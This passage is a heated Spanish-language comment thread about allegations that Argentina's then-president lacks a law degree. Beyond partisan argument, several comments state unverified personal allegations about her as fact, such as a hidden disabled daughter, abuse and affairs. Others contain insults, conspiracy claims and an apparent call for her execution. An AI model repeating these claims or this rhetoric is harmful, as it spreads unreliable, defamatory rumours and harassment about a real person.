          HABER SI ENTRAS EN RAZON, NADIE HABLA DE SI ES PRESIDENTE O SI GANO MAL O BIEN LAS ELECCIONES, NI NADIE HABLA DE POLITICA EN SI…. ES UN TEMA DE HONESTIDAD, TRANSPARENCIA, COMO QUIERAS LLAMARLO… TE SOY SINCERO, OJALA NO SEA CIERTO ESTO, SINO ESTAMOS ANTE UN FRAUDE MUY RECONOCIBLE Y DOLOROSO.. TE LO DIGO EN CRIOLLO, NOS METIO EL DEDO EN EL CULO A TODOS, NO PONGO EN TELA DE JUICIO SI SU MANDATO ES BUENO O MALO… DIGO QUE SI ES CAPAZ DE HACER ESTO, QUE LE VA A CALENTAR AFANARSE TODO SI YA ENTRO POR EL LADO DE LA MENTIRA… RUEGO POR QUE SE TRATE DE UNA MENTIRA.. SINO ESTE PAIS CAYO EN MANOS EQUIVOCADAS.. SIN HACER POLITIQUERIA

      • Anónimo dice:

        no solo se robo la guita…. se robó la memoria que tanto esgrimio

      • hilario dice:

        JOSE LUIS, DE ESTA SEÑORA NO SE PUEDE ESPERAR NADA BUENO, EN ELLA TODO ES MENTIRA, A TAL PUNTO LLEGÓ QUE SIEMPRE HABLA DE SUS DOS HIJOS, CUANDO EN REALIDAD TIENE TRES HIJOS, LA MAYOR SE LLAMA CAROLINA PULQUI, QUE LE TIENE OCULTA, PORQUE ES DIFERENCIADA , LE DA VERGUENZA MOSTRARLA, CON ESO TA DA LA PAUTA DE QUE CLASE DE SER HUMANO ES.-

      • juan péron dice:

        macho, si esta mina hubiera asesinado a alguien, y se sospechara de eso, vos seguirias insistiendo que lo importante es que la voto el 54%. Saludos.

    • gabriel dice:

      No es el tema de porque es o no presidente, el tema es porque trucho papeles. no podes ser tan necio y estupido. TRUCHO, ROBO, MINTIO.
      que sea presidenta es otro tema, que si hilas fino espero que no mienta como hizo cpon el titulo
      segui con esa idea k, que asi no s va a todos

    • liliana dice:

      Santiago, es verdad que cuando se vota importa mas la persona, sus cualidades, su etica, sus propuestas, que el titulo universitario. Pero de comprobarse esta situacion, vos no te preguntarias en cuantas cosas mas nos mintio? Quizas estas acostumbrado a la corrupcion, a la mentira, pero realmente yo lo primero que pido de un funcionario es actitud ética, honestidad….ademas el usar un titulo sin tenerlo es delito… es más, habria que analizar en que comisiones actuo cuando era senadora, si firmo como abogada… porque eso haria que todo lo actuado sea nulo… es terrible… Esperemos que pronto la UNLP muestre el analítico que es el que realmente vale yqu puesdan verificarse los libros donde estan anotadas las materias…

    • Anónimo dice:

      No te suena ni un poquito en tu cabecita, el hecho de que un presidente mienta a todos y todas. Si una mitómana está presidiendonos y a nadie le importa, entonces estamos perdidos. Sólo te recuerdo que el relato de esta mentirosa, tapa o pretende tapar toda la corrupción de este gobierno. Te recuerdo que la corrupción mata y hambrea al pueblo. Pero si a vos y a 39999998, no les importa… bueno…. Ya voy sacando el pasaporte.

  7. DANTE dice:

    Siguiendo con el comentario de EZE, para mi es un dato irrelevante el hecho de no figurar inscripta en ningún Colegio de Abogados, dado a que uno puede recibirse y trabajar en un estudio jurídico, tal fué el caso de ella que trabajó con su marido, donde solo hace falta que esté inscripto el abogado firmante. Además dicen haber truchado un título donde figuran borroneada la fecha y número de documento, yo me pregunto ¿ese título tenía solo esos datos?, porque los demás está claro no fueron adulterados. Me respondo: La fábrica de mentiras parece estar llenas de mentiras más fácil de demostrar que las que ellos quieren hacer. Traten de conseguir más votos para el 2015 ofreciendo posibilidades concretas a los 40 millones de argentinos para vivir mejor que ahora, porque de esta forma van a seguir siendo “puchero de cola”.

  8. MENCHO TERERE dice:

    ASÍ QUE DEBE 22 MATERIAS????….SEGURO QUE UNA ES CORRELATIVA DE LAS OTRAS 21,….SÍÍÍÍÍ ESTAMOS DE ACUERDO,…LA QUE LE FALTA ES LA MATERIA GRIS !!!!!

    • Ana dice:

      Estimado Forista, mi más profundo respeto…pero gracias por hacerme largar una carcajada que hasta mi esposo en el living, vino a leer su comentario. Gracias mi estimado forista jajajajajajajaajajajajajajajaja.

  9. Graciela dice:

    Sigan pensando así como el inútil y lobbysta de Sabsay,.
    CFK es la persona que mas ha hecho por el pueblo de este país.-
    Es admirable su elocuencia, y su retórica.-
    La oposición argentina de verguenza ajena. Son una manga de inútiles a quienes no se les cae una sola idea de como gobernar un país.-

    • Justiniano dice:

      El mayor daño que ha hecho Cristina es sembrar el odio, la violencia y la intolerancia contra todo aquello que no esta dentro de su discurso. Estamos de acuerdo, su retorica y elocuencia son impecables.. Ojala las usara para unir al pueblo y no para dividirlo..

    • jorge dice:

      Querida que labado de cabeza que tenes que no pode sver mas alla de tu nariz, decime cuanta gente desde hace 10 años a esta parte saco de la pobreza ?, o no te das cuenta que el versito de la justicia social y la clase pobre a ella y sus secuaces no le interesa nada. Despeta querida, vos miras lo bueno que hizo yy de esa manera das vuelta cara y te dejas robar, te dejas someter y discutis por alguien que se caga de risa de vos y el resto del publo, No tiene titulo es una impostora, por lo tanto debe ser juzgada por tal , como no va querer cambiar las reglas y leyes existentes, si ella fue la primera en rompero con las reglas en su cargo de presidente, por eso estan desesperados en cambiar las leyes para no ir en cana, Como puede haber gente que mire para otro lado con lo que esta pasando, simp´lemente porque le conviene, por plata baila el mono y vos defendes lo indefendible. Vos con tu manera de pensar la unica opcion que tenes es a laguien como ella , porque si no fuera asi sabes muy bien que todos los zurdos no tienen chanches en este pais. Segui padeciendo la muerte lenta, todo llega y todo se paga.

    • Anónimo dice:

      Y VOS UNA CORRUPTA MANTENIDA…

    • Ana dice:

      Si es tan transparente, deseo que digas cómo hizo esta familia de tener 2 millones dólares ha 156 millones de dólares. Yo sólo deseo saber qué fórmula aplicaron, para enriquecerse…después hablamos de lo que sea. Pero quiero saber cómo hicieron…

  10. maria dice:

    EZE yo tengo 74 años y nunca fui a clase el 12 de octubre, en primaria ni en secundaria,por lo tanto el feriado nacional existe desde muchos años antes que 1982.

  11. santos dice:

    ES UNA HIJA DE PUTA CHORRA ……. LO MAS TRISTE ES QUE HAY PELOTUDOS QUE TODAVÍA LA APLAUDEN, TODO POR UN CHORI PAN, MIENTRAS LA GRAN CHORRA SE LLEVA LA PLATA EN BOLSAS Y SE CAGA DE RISA DEL PUEBLO CAGADO DE HAMBRE, MAS MISERIA QUE NUNCA, INFLACIÓN DEL 40% Y LOS NARCOS SE FLOREAN POR TODA LA ARGENTINA, REINA LA INSEGURIDAD EN TODO EL PAÍS . POLÍTICOS CORRUPTOS, LOS VALORES SUBVERTIDOS TODO GRACIAS A ESTOS HIJOS DE PUTA QUE NOS GOBIERNAN.

    • Anónimo dice:

      ya la vas a extrañar, ojala que no ! que el que venga sea mejor ! pero todo lo que se hizo, creo que te quejas de lleno.
      aun le faltan muchas cosas, por ejemplo educar a la gente que insulta de mas, como vos

      • santos dice:

        MEJOR QUE TE CALLES COMEDECRISTINA VOS DEBES VIVIR DENTRO DE UN TAPER, Y SI NO TE GUSTA QUE INSULTE Y DIGA MALAS PALABRAS, PUES ENTONCES NO ME LEAS, TIENES ESA OPCIÓN.
        PERO :… DECIME QUE HIZO?? APARTE DE ROBAR MEDIO PAÍS???… Y LOS TARADO/AS SIGUEN APLAUDIENDO Y TODO POR UN CHORIPAN Y ELLA SE LLEVA LA PLATA EN BOLSONES,GIL.

      • Anónimo dice:

        que hicieron ineptos en la adm. publica, inflacion, inseguridad, mas pobres mas villas, que carajo hicieron, un inepto de min. de econ., un vice corrupto dejate de joder vayanse para nunca volver

  12. Ricardo quintar dice:

    Vi el comentario de un ignorante que dice que se hacen decir doctor los abogados y médicos. ..y tiene razón no son doctores..es el uso popular..pero se rompieron el alma estudiando y si son abogados y médicos. .no Cómo está atorrantes que se arroga atributos de profesional y solo término la secundaria…me gustaría que este ciego se haga atender por Cristina si mañana dice que es médica. “ARGENTINO E IGNORANTE SE ESCRIBEN CON LAS MISMAS LETRA ;;LUCHEMOS POR QUE NO SEAN SINONIMOS “

    • hilario dice:

      JOSE LUIS, DE ESTA SEÑORA NO SE PUEDE ESPERAR NADA BUENO, EN ELLA TODO ES MENTIRA, A TAL PUNTO LLEGÓ QUE SIEMPRE HABLA DE SUS DOS HIJOS, CUANDO EN REALIDAD TIENE TRES HIJOS, LA MAYOR SE LLAMA CAROLINA PULQUI, QUE LE TIENE OCULTA, PORQUE ES DIFERENCIADA , LE DA VERGUENZA MOSTRARLA, CON ESO TA DA LA PAUTA DE QUE CLASE DE SER HUMANO ES.-

  13. Daniel dice:

    “El 19 de Febrero de 1953, fecha de nacimiento de Cristina Kirchner, está sobreimpresa, pero se ve borroneado un 10 de Agosto de 1989” fecha que no se corresponde con el Nº de DNI del Sr. Olmos que es el que figura como borroneado. Aparte si tengo los estudios completes de abogado no voy a ponerme una carnicería, si bien la carne deja buena renta no es tanta como como la de un abogado, así que por favor investiguemos seriamente hacia ambas partes en vez de tirar bombas al voleo. Además si no lo es hizo por la patria mucho más que todos los boga juntos estuvieron antes.

  14. Pedro dice:

    Para que se haga justicia realmente como corresponde, si la Sra. nunca tuvo su titulo de abogada, debería primero renunciar a su cargo y acto seguido debería devolver todo el dinero que le haya ingresado de parte del estado nacional desde el momento en que comenzó a ejercer cargos públicos en los cuales debería haber tenido dicho título que si no estoy mal informado sería a partir de cuando fue electa como Senadora nacional, además se le debería reclamar también todo el dinero que ha utilizado de las arcas del estado nacional para todos los viajes realizados al exterior en representación de nuestro país más todo lo gastado en la estructura de sus traslados y forma de vida de mega estrella.
    También debería cumplir una condena penal por estafas reiteradas, malversación de fondos públicos y traición a la patria.
    Creo que solo devolviendo lo que cobró y lo que ha gastado en todos estos años para sí podríamos pagarle a los fondos buitres y sobraría dinero para realizar muchas obras de infraestructura .
    Dios salve a la Argentina, por favor metan presa a Cristina !!!!

  15. Maracaibo dice:

    Vamos a algo concreto, puntual y objetivo. Dos preguntas, ni pro-K ni anti-K.
    1- Si es abogada:

    ¿por qué no muestra su título, pruebas y aclara las dudas de una vez?
    Es la presidente, pero el pueblo quiere saber y ya que ella gusta salirse del protocolo que lo haga esta vez también y aclare las cosas. Seguro mejoraria un poco su imagen.

    2- Si no es abogada:
    ¿ cómo hizo para tener semejante fortuna personal cuando ella mismo declaró ser una abogada exitosa antes de ser presidente?

  16. te dije dice:

    ahhhhhjajajajajajajaja…

  17. Anónimo dice:

    ¿ABOGADA?
    El ejercicio de la política exige como premisa de aceptación en el público ciudadano de TRANSPARENCIA BASADA EN LA MORAL Y LA ETICA. Comportamiento a rendir con mayor SEVERIDAD cuando el voto popular instala a una compatriota en el sitial de la PRIMERA MAGISTRATURA. A poco de instalarse el KIRCHNERATO comenzó a circular la versión de que la Presidente era una FALSA ABOGADA, pues nunca llego a graduarse en la Universidad de La Plata, donde estuvo inscripta y, por ende, jamás se matriculó en esa profesión que nunca ejerció. Ello fue deslizándose hacia un “DE ESO NO SE HABLA”, con la complicidad perdonavidas del “laissez faire, laissez passer”.
    Era su OBLIGACIÓN INEXCUSABLE DERIVADA DEL MÁXIMO CARGO que ocupa correr a desmentir personalmente la ACUSACIÓN DE USURPADORA DE TÍTULO UNIVERSITARIO y accionar ante quien corresponda institucionalmente ASUMIENDO LA CARGA DE LA PRUEBA que demostrara la improcedencia de la denuncia; que hoy es formulada publicamente por un distinguido profesor de Derecho Constitucional, hombre reconocido como AUTORIDAD DESTACADA EN LOS AMBIENTES TRIBUNALICIOS Y CIENTÍFICOS rectores de la Ciencia Social del DERECHO. Esperamos con intriga que esta dama actúe con el HONOR condigno a su condición de EJEMPLO VIVIENTE para los ciudadanos a los que gobierna.-
    El “barrilete no cósmico” del título universitario de la Presidenta flotaba entre las brisas como un documento enganchado en la parrilla del juguete infantil.
    NADIE TIRABA LA PRIMERA PIEDRA PARA BAJARLO y revisar sus pliegues. Alguien ha tenido la VALENTIA (“OSADÍA”, dira ESHA) y dio en el blanco (en la realidad, negro.). Ahora esperamos el comportamiento de la LIGA DE LOS TIBIOS OPOSITORES. ¿Que harán Massa, Macri, Binner, Cobos, Sanz, Stolbizer, Solanas y muchisimos que descansaron, (casi todos en sus bancas de legisladores),sin gastar proyectiles, total “de eso se ocupa Lilita”). Es HORA DE QUITARSE LAS CARETAS Y COLOCARSE LOS CASCOS DE GUERRA. De lo contrario, como alguien ya propuso: “SABSAY 2015”; doctor, vaya eligiendo compañero de fórmula.
    ¡Caraduras! LEGIÓN DE LOS TIBIOS OPOSITORES: comiencen ya a reclamarle el TÍTULO DE ABOGADA USURPADO a la que vds. saben. Basta de MEDIAS TINTAS.

    Era de esperar que las IDEAS de los VALIENTES fueran replicadas por las IDEAS de los COBARDES Y SOCIOS DEL PODER POLÍTICO, que siempre anidan en este tipo de organizaciones donde los INTERESES devengan prioridad ante los PRINCIPIOS MORALES Y CÍVICOS. Tienen el mismo peso que las AMEBAS. Jamás van a producir OVACIONES, sino desperdigados aplausitos de otros microbios presentes. Hay que soportarlos como estorbos espontáneos; NO HACEN MELLA A LAS VERDADES que son temidas y replicadas como ofensivas.
    Adhiero al reclamo del DR. SABSAY para que la doña exhiba lo que nunca quiso mostrar. No le pedimos pornografia, sino que ASUMA LA CARGA DE LA PRUEBA (deber moral y ético para esta clase de acusadas).-

  18. Juan dice:

    La usurpación de títulos y honores es un delito, y como tal debe ser investigado y sancionado con la pena pertinente. La presidente no debe estar por encima de la ley, sino como todos, cumpliendo la ley.

  19. Godsaj dice:

    Primero que nada, yo no soy Argentino, no estoy ni a favor ni en contra del gobierno de Argentina, pero tengo amistades argentinas que están pasando por la situación por la que atraviesa Argentina, y es por eso que no pude evitar leer esta nota.

    Y hay algo en esta nota que no me queda claro, porque dan 2 fechas diferentes de la fecha de nacimiento de Valentin Olmos, el supuesto titular del documento en cuestión.

    Abajo de la imagen del supuesto documento de la presidente aparecen los datos de Valentin Olmos supuesto titular del documento, y su fecha de nacimiento dice 16/12/1943 (70 años)

    Y en la imagen donde supuestamente está remarcada la fecha aparece otra totalmente diferente, 10 de Agosto de 1989, casi 46 años de diferencia.
    ¿como puede ser que un dato supuestamente tan importante, tenga un error tan obvio?

  20. La página oficial de Presidencia de la Nación expresa, con relacion al CV de CFK.,:”Cursó sus estudios de abogacia en la Facultad de Ciencias Jurídicas y Sociales de la Universidad Nacional de La Plata” (sic). La obtención de un título se consigna así:” Titulo-Universidad-Año (del egreso)”
    El “Cursó sus estudios” es un eufemismo que quiere decir eso:”cursó”…más no los terminó.

  21. Anónimo 2 dice:

    La solución que se muestren las pruebas (analítico y titulo) , y se acabo, la duda.

  22. jorge dice:

    Cuando alguien duda si soy algo, o no; lo único que tengo que hacer es sacar el Título y mostrarlo, cual es el problema? se acaba la historia y sigo para adelante. Ahora la usurpación de título es penable por ley, jajaja se acuerdan del “ingeniero” Blumberg, el trucho, este caso es igual

  23. MENCHO TERERE dice:

    ABOGADA O NO ABOGADA, QUÉ MÁS DÁ, LO MISMO EN UNA INFAME TRAIDORA A LA PATRIA, CON O SIN TITULOS, LA PENA NO HACE DISTINGOS, AL PELOTÓN !!!!

    • Forro dice:

      “Al paredón” es la frase para pedir su ejecución; al pelotón significa que es una soldado y debe presentarse a una misión junto a su pelotón… bueh que se puede esperar de un mencho cambá talón yecá?

  24. Alejando Nicolaides dice:

    Creo que lo han logrado!
    Son agentes de gobiernos extranjeros con el mandato de liquidar a la argentina!
    Nestor era Chileno! Nunca debió ser investido presidente!
    Todo el mundo lo sabe en Gallegos!
    Todos los actos de gobierno firmados por ellos deben ser declarados nulos!

  25. Juan Domingo Cangallo dice:

    Jajaja los fachistos lame bolas se Seprin volvieron a manejar Photochop

  26. Anónimo dice:

    Reitero: era y es su OBLIGACIÓN INEXCUSABLE DERIVADA DEL MÁXIMO CARGO que ocupa correr a desmentir personalmente la ACUSACIÓN DE USURPADORA DE TÍTULO UNIVERSITARIO y accionar ante quien corresponda institucionalmente ASUMIENDO LA CARGA DE LA PRUEBA que demostrara la improcedencia de la denuncia. EN FORMA PERSONAL, UTILIZANDO, si lo desea, la CADENA NACIONAL.-

  27. angel dice:

    No hay objetividad ni pensamiento crítico en sus seguidores. En mi caso, reconozco que hizo un par de cosas buenas (igualdad de género, por ejemplo) pero millones de otras cosas malas. Está destruyendo al país y generando rivalidades. No es un partido de fútbol, es un país, el país que estamos construyendo y dejando a nuestras futuras generaciones. No podemos construir sobre mentiras y engaños. Se están robando todo delante de nuestras narices. Es insostenible esta situación. No se puede defender lo indefendible.

    • cecilia dice:

      destruyendo? 14 nuevas universidades, profundizó la democratización en los claustros. Se ocupó de que aumente la matrícula en primaria y secundaria. Aumentó el presupuesto educativo. Facilitó el ingreso de capitales para el desarrollo industrial mientras, los capitales ¨nacionales¨ juegan a la ruleta financiera que es jueguito que estrenaron en los 90 y del cual no se quieren bajar. Asignación para las persones que no logran acceder al mercado laboral (empresarios que creen en la ruleta y no abren empresas), subsidio a las tarifas de luz gas subvención incluso a la educación privada! YPF nacionalizada y estatizada! nuevos descubrimientos de pozos de petroleo y planificación de su explotación. Lugares donde ocurre esto hay más trabajo más ciudades que progresan más comerciantes que se llenan los bolsillos más gente con derecho al consumo. No se… vos a qué te referis exactamente?

  28. KAISER dice:

    AL QUE HABRIA QUE INVESTIGAR ES AL INFELIZ DEL BLOG ESTE, ESE IMPRESO TRUCHO QUE CUALQUIERA SABE QUE HOY DIA SE SCANEA UN PAPEL Y SE LO PUEDE MANIPULAR CON CUANTO SOFTWARE EXISTA… LO UNICO CREIBLE ES QUE SALGA UN REPORTAJE TELEVISIVO CON EL TESTIMONIO DE AUTORIDADES DE LA FACULTAD DONDE CURSÓ DANDO FE DE QUE NO SE RECIBIO Y MOSTRANDO EN VIVO LOS PAPELES… NO LES PARECE QUE SI ESO HUBIERA PODIDO CORROBORARSE DE ESA MANERA YA NO LO HUBIERA HECHO LANATA, TN Y EL SOQUETE DE MEDIOS OPOSITORES.. MUY TRUCHO ESTE BLOG..

  29. Nahuel dice:

    Que fachos que sonnnnnnnnnnnnnnnnnnnnnnnnnnnn. FACHOS FACHOS FACHOS.

  30. Anónimo dice:

    Es realmente increíble como algunos quieren minimizar un tema tan importante es real q no logro los votos por ser abogada, pero y la honestidad? Y q hace pensar si miente eso no miente en el lo de enriquecerse ilícitamente x ej. Lo q realizó en este pais fue y es lamentable. Los chicos mo se educan la gente prefiere un plan antes q trabajar. Ahora le pagan a una mujer para q vaya a controlar su embarazo, para q lleve a sus hijos a la escuela o para q los vacunen. Nuestros padres hacian eso porq nos amaban no xq habia un Gobierno q los compraban. El Gobierno miente con la inflación, la inseguridad y la desocupación xq no va a mentir con un título. Si es mentira eso daña las instituciones no el estar a favor o encontra de un Gobierno. Las historias se cuentan completas si no no se cuentan

  31. Ernesto dice:

    Lo ideal es que intervenga la Corte y de orden de rematricular a todos los abogados como paso hace 25 años mas o menos. Nos llevaremos una gran sorpresa..

  32. Maribell dice:

    no se que tan precisa sea la “investigación”, pues en el documento supuestamente falsificado dicen que el dueño verdadero del título nació el 10 de agosto de 1989, y que dicen se ve claramente como fue borroneado, pero luego en la ficha que publican debajo con los datos de olmos, la fecha de nacimiento dice que es 16 de diciembre de 1943! entonces en que quedamos? yo no defiendo a este gobierno, pero me parece totalmente fuera de lugar que esta publicación se haga llamar investigación seria…

  33. gabriel dice:

    que gente pelotuda, se hacen problemas por si cristina es o no abogada, piden q muestre el titulo como si estaria obligada a hacerlo jajajaj
    cristina es nuestra presidenta no nuestra abogada, mejor ocupen un poco sus vidas en hacer algo mejor antes q andar de boludos repitiendo lo q dicen estas notas fantasmas

    • res non verba dice:

      kakarulo no podes ser tan mamerto NO AFIRMES SI NO VIVISTE tengo mas de 75 años y desde que fui al colegio el 12 de octubre era feriado administrativo, vario como feriado nacional en varias oportunidades pero no administrativo , ESO SIGNIFICA NO CLASES, siempre lo fue, perejil ¨ esto me hace dudar ^ siempre es buena la duda, y a partir de ella se construye, pero tambien es cierto que la idiotez de algunos humanos es infinita y tenes todos los numeros de la rifa, si buscas en internet busca bien , no recortes, lo tuyo es tan trucho como el titulo que no es Kakarulo , facil , como hizo sabsay o cualquier profesional vas al cuadrito que enmarcaste 24 horas despues que lo recibiste y que te va a acompañar a cualquier lugar , le sacas una fotocopia, la subis a la red y listo . el titulo nunca aparece, y si alguien es capaz de usurpar titulo que cosa no usurparia , que te garue finito kakita

  34. ezekf@hotmail.com dice:

    que BOLUDOS SON

  35. Oscar dice:

    el numero de DNI no corresponde a un nacido en 1989

  36. Teresa dice:

    En el año 1979, plena dictadura, el 12 de octubre NO FUE FERIADO. Doy fe porque ese día yo comencé mi primer trabajo.

  37. José María Martoccia dice:

    Y ahora se sumo con la misma opinión otro hombre de leyes que la sabe lunga como Julio César Strassera . . .

  38. ramiro dice:

    Es verdad o mentira?despues vemos,si la realidad salto por tal o cual cosa,la ley es la ley y la justicia para todos y todas,ya que nuestras vidas dependen de deciciones de falsos y mentirosos,con un apollo de boludos y pelotudos,como se refieren a quien no cree como ellos(como si esto fuera una cuestion de fe!), repitiendo lo que le cuentan estos expertos que lincharon a blumberg por lo de “ingeniero”.Vamos de nuevo:Es verdad dra.rimolo?

  39. beatriz borda dice:

    Mi hijo en 5 años se esta recibiendo de ABOGADO y el año que viene hace el doctorado… entonces puedo hacerme la ilusión ante este ejemplo de la Presidenta,… que él puede llegar a ser REY… ja jaja.. Ahora bien, en serio, si esto es verdad, queda bien cuando el Presidente de Uruguay nos dijo lo que nos dijo.. recuerdan??… Esperemos el 2015 y después se verá si los que vienen son “truchos” o no…

  40. LAURA dice:

    SI ESTO ES VERDAD QUE LA PERSONA QUE ESTA EN EL SILLON DE RIVADAVIA NO ES ABOGADA TENDRIA QUE IR PRESA…ARGENTINA PAIS GENEROSO

  41. Ana dice:

    Estimado Sr. Alderete…por estos días me he preguntado, lo que escuché hace muy poco tiempo atrás en un medio, en el programa de Grodona, para ser exacta:”¿Cuánta verdad puede sorportar un argentino?”…creo que ese es el concepto. Que no es profesional, como yo me jubile de tal, ni lo pongo en duda. Los años de experiencia, a una la dejan en otro estado de socialización, de trato con el público, con sus clientes. Como se lo he expresado antes, esta mujer, es la verguenza ajena del resto de las mujeres argentinas, debería se deportada a una isla en el más absoluto aislamiento, tiene tan podrido el concepto de humanidad en su interior…que solo lo palea, con dos dósis diarias de clonazepan. Y mis respetos al colega, Daniel Sabsay…alguien con una trayectoria, impecable. Gracias por informarnos Sr. Alderete…

  42. Paternalista dice:

    Cuando BLUMBERG (muchos que hoy sufren la TERRIBLE INSEGURIDAD no recuerdan su cruzada por el asesinato de su hijo ALEX) se presentó como CANDIDATO A DIPUTADO, lo escarcharon porque encontraron que le decían INGENIERO, pero no poseía ese TITULO. Con indignación leo algunos individuos que dicen no importarles que la ¡PRESIDENTA DE LA NACIÓN! del su país, este país, NUESTRO PAÍS, hace decenas de años que USURPA EL TÍTULO DE ABOGADA (“ÉXITOSA”, como proclamará publicamente en Harvard). Vale decir que la R.A. ha sido gobernada y legisladas por UNA DELINCUENTE QUE HA VIOLADO EL ARTICULADO DEL CÓDIGO PENAL referido a USURPACION DE TITULOS Y HONORES. El único atenuante que tienen estos “Momos Sabios” es que los POLÍTICOS DE LA SUPUESTA OPOSICION desfilan por “A Dos Voces”, sanatear, firman un acta (menos el Felpudo Scioli), y ni hacen mención al TEMA DE LA INFRACTORA A LA LEY PENAL que ocupa el sillón al que ellos aspiran. Por lo tanto: ¿que se puede esperar de este pueblo con estos seudos dirigentes?

  43. Anónimo dice:

    Cuando deje ĺa presidencia si va a seguir haciendo el trabajito q hacia antes q me avise xq la vieja todavia esta bastante buena

  44. NACIONAL Y POPULAR dice:


    COMO INVENTA EL GORILAJE! SIGUEN DESESPERADOS? TRANQUILOS, ESTA ES LA PRIMERA DECADA GANDA, ES APENAS LA INTRODUCCION. SE VIENEN MUCHAS MAS!
    YA NOS TOMAMOS PARA LA RISA ESTAS BOLUDECES. PUROS ATAQUES DE ODIO PARA DESESTABILIZAR, YA ESTAMOS ACOSTUMBRADOS PERO CRISTINA SE HACE MAS FUERTE CADA VEZ QUE VIENEN CON SUS MENTIRAS DE ODIO! CRISTINA ES MI PRESIDENTA, LA PRESIDENTA DE TODOS LOS ARGENTINOS Y ARGENTINAS, PRESIDENTA CORAJE! ME ENCANTA QUE NO SE REBAJE Y QUE IGNORE A TODA LA GORILADA. AL CUMPLIRSE UN NUEVO HOMENAJE DE LA MUERTE DEL MEJOR PRESIDENTE ARGENTINO DESDE LA VUELTA DE LA DEMOCRACIA, NESTOR CARLOS KIRCHNER, MAGNETTO NECESITO DESVIAR LA ATENCION DANDOLE AIRE AL COLOQUIO DE IDEA, EL MISMO QUE APLAUDIO A VIDELA!
    PARA QUIEN TRABAJA SABSAY? PODER CIUDADANO, LES SUENA? PODER CIUDADANO ES FINANCIADO POR LA EMBAJADA BRITANICA, LA FUNDACION FORD Y TRANSPARENCY INTERNATIONAL (LA MISMA QUE APOYO EL INTENTO DE GOLPE DE ESTADO EN VENEZUELA) NADA ES CASUAL. QUE RECIBA APOYO DEL IMPERIO, DE LA CIA, LOS BUITRES Y QUE CASUALMENTE MAGNETO LE DE AIRE. Y QUE LA CLASE MIERDA (NO MEDIA, MIERDA) SE HAGA ECO Y SE HAGA ECO DE ESTO Y SEA LA PROPALADORA DEL GORILAJE, TAMPOCO ES CASUAL.
    NO PUEDEN CONTRA EL 54% DE LOS ARGENTINOS! NO PUEDEN CONTRA LA DEMOCRACIA, NO PUEDEN CONTRA EL PUEBLO!! EL PUEBLO ELIGIO ESTE MODELO Y LOS SEGUIRA ELIGIENDO!!!
    EN EL PROXIMO ACTO VOY A GRITAR CADA VEZ MAS FUERTE “CRISTINA CORAZON, ACA TENES LOS PIBES PARA LA LIBERACION” PORQUE SUS ATAQUES DE ODIO NOS HACEN MAS FUERTE!!!
    QUE LINDO HABER VISTO A CASEY! CON SOLO 11 AÑOS SUPERA AL MEJOR INTELECTUAL DE LA CLASE MIERDA http://www.youtube.com/watch?v=vfJ50i1REzc HACE CLICK! MIRALO! ESO ES LO QUE TENDRIA QUE ESTAR EN LOS MEDIOS,ESTOS SON LOS PIBES QUE QUEREMOS! ESTOS SON LOS PIBES DE LA LIBERACION! ESTOS SON EL FUTURO! PORQUE LOS MEDIOS HEGEMONICOS NO LE DAN AIRE A CASEY Y SI A SABSAY? NADA ES CASUAL!
    SOMOS PATRIA! UDS. SON BUITRES!
    VIVA LA PATRIA!!

    • MENCHO TERERE dice:

      OJALA NUNCA TE ENCUENTRES CARA A CARA CON UN FASCISTA, ENTONCES TE VAS ENTERAR DE LAS INFINITAS MANERAS DE “SER BOLETA”

    • Chesare dice:

      Vacunáte contra la rabia, porque te vas a ahogar con la espuma que te sale por la boca flaquito. Porqué no averiguas con las Madres de Plaza de Mayo tu procedencia?…Por ahí sos hijo de D¨Elía y no te diste cuenta…seguramente sos hijo de D¨Elia!

    • Jaramillo dice:

      Bueno por lo menos ya sabemos que este pibe Nacional y Pop es de esos ñoquis que van a gritar por Kretina a los actos, o sea un ñoqui , no labura y cobra por ir a los actos, osea su seudo-fanatismo tiene un precio, mañana cuando no este Kretina ve como puede acomodarse para seguir cobrando por alentar a alguien. Habla de los que aplaudieron a Videla y resulto que su Heroes de barro fueron los que se asociaron a Videla haciendo fortuna con la circular 1050, haciendo fortunas y luego justificandola diciendo que eran abogados exitosos, ya se ve La Cretina que le gusta mucho figurar al parecer debe 22( VEINTIDOS ) materias, pero la ideologia K es esa, ponete al lado de quien sea con tal de ganar guita, no importa de que forma.
      En cuanto al 54% de argentinos que nombra, hay que avisarle que ya no es el 54% ( porque será ) y no eran todos de origen argentino, sino grab % de extranjeros nacionalizados por dinero.
      En cuabto a los pibes que este señor menciona, es lamentable que chicos de esa corta edad ya le haya podrido la cabeza con politica, pero son los mismo chicos a los que le enseñaron a odiar y a escupir los retratos de peridoistas y famosos, imaginense el odio que puede llegar a juntar un chico asi hasta llegar a se adulto. Este es el fiel reflejo de la politica K, estas son las consecuencia, y lo mas lindo que se enorgullesen porque el pibe se apredio de memoria el cassete que toda esta gente tienen incorporado a su cerebro. En cuanto a la clase ( Mierda) como menciona con tanto odio, es porque sabe que la mayoria de la clase media no la voto , de ahi el odio, el que le enseñaron a el , ahi esa division con rencores y broncas pero al parecer lo que no sabe este señor, que el sueldo que le pagan a el para escribir estas boludeces, viene de esa clase de gente que es la que siempre sostuvo este pais. Sino que pruebe una mejor vida con la clase mas sometida inclusive en la ultima decada, o con los ricos, a ver cuanto puede currar de ellos. La ignorancia es tal que realmente asusta, la decada K , NIVELAR PARA ABAJO para parecer que todo esta regio. Que lastima que haya gente asi en nuestro pais y que piensen que son patriotas.

      • CARLOS BÁEZ dice:

        Para Jaramillo… es exelente tu exposición, yo queria contestarle a este señor, pero con lo que escribiste basta, lo tuyo tiene sentido, lo de esta persona tiene “peso” pero no por argumentos sino por dinero, ahi esta la diferencia, le deberia dar verguenza cobrar ese dinero que viene de la clase que el humilla, robarle a la clase media y despues repudiarlos, esa es la generación K , menos mal que ya esta en retirada. yo me pregunto ¿ que dirá cuando comiencen a salir a la luz lo que esta … mujer hace e hizo en toda su carrera, que hasta abandono una hija con problemas mentales, que esta sospechada de por lo menos abandono de persona por la muerte de su esposo, que se acosto con varios de los que hoy estan a su lado y Néstor muchas veces la golpeo por eso? y eso por nombrar las cosas mas pequeñas que hizo, ¿seguirá diciendo que es cristinista? mmm, esta persona es un pobre infeliz

    • claudio dice:

